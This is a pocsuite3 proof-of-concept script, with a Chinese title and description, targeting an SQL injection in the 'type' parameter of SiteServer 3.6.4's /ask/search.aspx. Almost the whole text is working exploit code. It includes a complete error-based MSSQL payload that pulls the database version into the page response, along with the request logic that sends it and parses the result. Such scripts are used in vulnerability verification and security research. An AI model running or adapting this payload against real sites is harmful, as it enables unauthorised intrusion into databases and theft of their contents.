SiteServer 3.6.4 /ask/search.aspx SQL注入漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from urllib.parse import urlencode from pocsuite3.api import Output, POCBase, register_poc, requests class DemoPOC(POCBase): vulID = '1193' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2014-02-11' createDate = '2014-02-27' updateDate = '2014-02-27' references = ['http://www.wooyun.org/bugs/wooyun-2014-050626'] name = 'SiteServer 3.6.4 /ask/search.aspx SQL注入漏洞 POC' appPowerLink = 'http://www.siteserver.cn/' appName = 'SiteServer Ask' appVersion = '3.5#' vulType = 'SQL Injection' desc = ''' SiteServer 3.6.4 /ask/search.aspx文件type参数存在SQL注入漏洞。 ''' samples = [] install_requires = [''] def _verify(self): result = {} payload = { 'type': "1' AND 9107=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(107)+CHAR(103)+CHAR(113)+CHAR(45)+CHAR(45)+CHAR(45)+CHAR(45)+(SELECT SUBSTRING((ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))),1,100))+CHAR(113)+CHAR(111)+CHAR(107)+CHAR(103)+CHAR(113)+CHAR(45)+CHAR(45)+CHAR(45)+CHAR(45))) AND 'czYG'='czYG" } vulnpage = '/ask/search.aspx?' url = self.url + vulnpage + urlencode(payload) response = requests.get(url) if 'qokgq----' in response: contentlist = response.split('qokgq----') if contentlist[1]: result['DBInfo'] = {} result['DBInfo']['DBVersion'] = contentlist[1] return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): pass register_poc(DemoPOC)